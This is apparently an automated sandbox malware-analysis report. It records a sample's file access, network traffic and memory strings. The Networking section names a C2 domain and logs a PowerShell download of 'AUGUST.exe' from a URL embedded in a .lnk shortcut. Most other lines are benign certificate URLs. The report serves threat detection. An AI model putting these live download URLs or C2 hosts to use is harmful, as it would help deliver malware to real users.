Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: fullimmersion777.com

Source: Joe Sandbox View

ASN Name: VOXILITYGB VOXILITYGB

Source: global traffic

HTTP traffic detected: GET /AUGUST.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: lawyerconsult.topConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /AUGUST.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: lawyerconsult.topConnection: Keep-Alive

Source: DZIPR.exe.12.dr

String found in binary or memory: support@datanumen.com+https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm"Total page file memory: %.0n bytes!Free page file memory: %.0n bytes Total virtual memory: %.0n bytes equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: lawyerconsult.top
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa

Source: DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://c0rl.m%L
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: edb.log.18.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: MdkbG2pK4l.lnk	String found in binary or memory: http://lawyerconsult.top/AUGUST.exe
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://support.datanumen.com
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
